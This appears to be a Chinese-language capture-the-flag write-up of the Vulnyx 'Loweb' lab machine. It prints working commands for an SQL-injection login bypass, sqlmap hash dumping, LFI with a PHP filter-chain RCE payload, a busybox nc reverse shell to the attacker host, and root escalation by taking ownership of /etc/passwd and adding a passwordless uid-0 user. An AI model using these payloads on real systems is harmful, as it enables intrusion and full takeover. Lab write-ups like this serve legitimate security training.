Vlx_Loweb

靶机来源: https://vulnyx.com/

难度:Low

一、信息收集

1、主机探测

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(root㉿kali)-[~/miaosec]
└─# nmap -sn 192.168.2.0/24              
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-18 10:11 +0800
Nmap scan report for 192.168.2.1
Host is up (0.00086s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00082s latency).
MAC Address: 08:00:27:95:70:C4 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.91
Host is up (0.00085s latency).
MAC Address: 08:00:27:35:5D:F7 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 7.50 seconds

靶机IP:192.168.2.91

2、端口扫描

1.全端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(root㉿kali)-[~/miaosec]
└─# nmap -sn 192.168.2.0/24              
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-18 10:11 +0800
Nmap scan report for 192.168.2.1
Host is up (0.00086s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00082s latency).
MAC Address: 08:00:27:95:70:C4 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.91
Host is up (0.00085s latency).
MAC Address: 08:00:27:35:5D:F7 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 7.50 seconds

开放端口:22、80

2.详细信息扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -sT -sC -sV -O -p22,80 192.168.2.91
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-18 10:12 +0800
Nmap scan report for 192.168.2.91
Host is up (0.00061s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u5 (protocol 2.0)
| ssh-hostkey: 
|   256 65:bb:ae:ef:71:d4:b5:c5:8f:e7:ee:dc:0b:27:46:c2 (ECDSA)
|_  256 ea:c8:da:c8:92:71:d8:8e:08:47:c0:66:e0:57:46:49 (ED25519)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.62 (Debian)
MAC Address: 08:00:27:35:5D:F7 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrec

3.udp扫描

1
2
3
4
5
6
7
8
9
10
11
┌──(root㉿kali)-[~/miaosec]
└─# nmap -sU --top-ports 100 192.168.2.91                    
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-18 10:13 +0800
Nmap scan report for 192.168.2.91
Host is up (0.0010s latency).
Not shown: 99 closed udp ports (port-unreach)
PORT   STATE         SERVICE
68/udp open|filtered dhcpc
MAC Address: 08:00:27:35:5D:F7 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 111.33 seconds

二、WEB渗透

1、80端口

访问80端口,是Apache的默认页面 img

2、目录扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
┌──(root㉿kali)-[~/miaosec]
└─# gobuster dir -u http://192.168.2.91 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,js,txt,bak
===============================================================
Gobuster v3.8.2
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.2.91
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8.2
[+] Extensions:              php,html,js,txt,bak
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
index.html           (Status: 200) [Size: 10701]
library              (Status: 301) [Size: 314] [--> http://192.168.2.91/library/]
server-status        (Status: 403) [Size: 277]

找到一个library,再次进行目录扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
┌──(root㉿kali)-[~/miaosec]
└─# gobuster dir -u http://192.168.2.91/library -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,js,txt,bak
===============================================================
Gobuster v3.8.2
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.2.91/library
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8.2
[+] Extensions:              js,txt,bak,php,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
index.html           (Status: 200) [Size: 1068]
login                (Status: 301) [Size: 320] [--> http://192.168.2.91/library/login/]
admin                (Status: 301) [Size: 320] [--> http://192.168.2.91/library/admin/]
script.js            (Status: 200) [Size: 322]

访问admin是一个登录框 img

3、SQL注入

尝试SQL注入,直接使用万能密码:admin' or 1=1 #成功进入到界面 img

尝试对登录界面的数据包进行SQL注入

1
2
3
4
5
6
7
8
┌──(root㉿kali)-[/tmp]
└─# sqlmap -l 1.txt --batch -D library -T users -C email,username,password --dump
+---------------------+----------+-----------------------------
| email               | username | password                                                     |
+---------------------+----------+-----------------------------
| john@example.com    | admin    | $2y$10$AkhF2T9slTqNPbwh6eRbVeLr5XW8ZqWvJ/zFapZ7Y8ZK0G70Hxo3W |
| r3dh4ck@example.com | r3dh4ck  | $2y$10$AkhF2T9slTqNPbwh6eRbVeLr5XW8ZqWvJ/zFapZ7Y8ZK0G70Hxo3W |
+---------------------+----------+-----------------------------

尝试对r3dh4ck用户的哈希值进行爆破,但发现无法爆破出来

4、PHP伪协议

查看页面源码,找到两个以php为后缀的文件

1
2
<a href="index.php?lang=es.php">es</a>
        <a href="index.php?lang=en.php">en</a>

尝试修改lang后面的数值为view-source:http://192.168.2.91/library/admin/index.php?lang=/etc/passwd,成功获取到文件

1
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin _apt:x:42:65534::/nonexistent:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin messagebus:x:100:107::/nonexistent:/usr/sbin/nologin sshd:x:101:65534::/run/sshd:/usr/sbin/nologin r3dh4ck:x:1000:1000::/home/r3dh4ck:/bin/bash mysql:x:102:110:MySQL Server,,,:/nonexistent:/bin/false

尝试使用伪协议读取文件的源码 view-source:http://192.168.2.91/library/admin/index.php?lang=php://filter/read=convert.base64-encode/resource=index.php

再对读取到的文件进行解码

1
2
3
4
5
6
....
<?php
$lang = isset($_GET['lang']) ? $_GET['lang'] : '';

include($lang)
?>

最后一段是一个后门脚本

直接使用php_filter_chain_generator进行RCE

1
2
3
4
5
┌──(root㉿kali)-[~/Tool]
└─# python3 php_filter_chain_generator.py --chain "<?php system(\$_GET['a']);?>"

[+] The following gadget chain will generate the following code : <?php system($_GET['a']);?> (base64 value: PD9waHAgc3lzdGVtKCRfR0VUWydhJ10pOz8+)
php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16|convert.iconv.WINDOWS-1258.UTF32LE|convert.iconv.ISIRI3342.ISO-IR-157|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSA_T500.UTF-32|convert.iconv.CP857.ISO-2022-JP-3|convert.iconv.ISO2022JP2.CP775|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM891.CSUNICODE|convert.iconv.ISO8859-14.ISO6937|convert.iconv.BIG-FIVE.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO88597.UTF16|convert.iconv.RK1048.UCS-4LE|convert.iconv.UTF32.CP1167|convert.iconv.CP9066.CSUCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UNICODE|convert.iconv.ISIRI3342.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UTF-16|convert.iconv.ISO6937.UTF16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.864.UTF32|convert.iconv.IBM912.NAPLPS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.ISO6937.8859_4|convert.iconv.IBM868.UTF-16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L4.UTF32|convert.iconv.CP1250.UCS-2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp

php://temp后面加上&a=id成功执行 img

三、获取shell

直接反弹shell &a=busybox nc 192.168.2.4 4444 -e /bin/bash

1
2
3
4
5
6
┌──(root㉿kali)-[~/Tool]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.91] 39578
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

稳定shell

1
2
3
4
5
6
7
8
/usr/bin/script -qc /bin/bash /dev/null
# 按下 Ctrl+Z 将其挂起
stty raw -echo; fg
# 按下回车
reset xterm
export TERM=xterm
export SHELL=/bin/bash
stty rows 24 columns 80

四、权限提升

1、获取r3dh4ck权限

/opt目录下找到一个文件monitor.sh

1
2
3
4
5
www-data@loweb:/var/www/html/library/admin$ ls -la /opt
total 12
drwxr-xr-x  2 root root 4096 Mar 15  2025 .
drwxr-xr-x 18 root root 4096 Feb 12  2024 ..
-rwxr-xr-x  1 root root  974 Mar 15  2025 monitor.sh

查看

1
2
3
www-data@loweb:/var/www/html/library/admin$ cat /opt/monitor.sh
SECRET_USER="r3dh4ck"
SECRET_PASS="contraseñaconÑjeje" # Change this password for the future

找到r3dh4ck的密码,成功进行登录

1
2
3
4
┌──(root㉿kali)-[~]
└─# ssh r3dh4ck@192.168.2.91   
r3dh4ck@loweb:~$ id
uid=1000(r3dh4ck) gid=1000(r3dh4ck) groups=1000(r3dh4ck)

2、获取root权限

查看sudo -l

1
2
3
4
5
6
r3dh4ck@loweb:~$ sudo -l
Matching Defaults entries for r3dh4ck on loweb:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User r3dh4ck may run the following commands on loweb:
    (ALL) NOPASSWD: /usr/bin/chown

修改/etc/passwd的文件所属主

1
r3dh4ck@loweb:~$ sudo /usr/bin/chown r3dh4ck /etc/passwd

添加一个跟root权限一样的用户

1
2
3
4
5
6
r3dh4ck@loweb:~$ echo "miao::0:0:Root Equivalent:/root:/bin/bash" >> /etc/passwd

r3dh4ck@loweb:~$ su miao
bash: warning: setlocale: LC_ALL: cannot change locale (zh_CN.UTF-8)
root@loweb:/home/r3dh4ck# id
uid=0(root) gid=0(root) groups=0(root)

五、查看FLAG

1
2
3
root@loweb:/# cat /root/r00t.txt /home/r3dh4ck/user.txt 
f6a0195e175989b2f9dd92fe4e35d6e4
ed568ec0cd3aef96d4c17a7f02a8391e
Vulnyx
#Sql注入 #PHP伪协议 #Sudo_Chown
Vlx_Loweb
http://miao-sec.github.io/Vulnyx/Vlx-Loweb/
作者
Miao
发布于
2026年3月18日
许可协议
BY-MIAO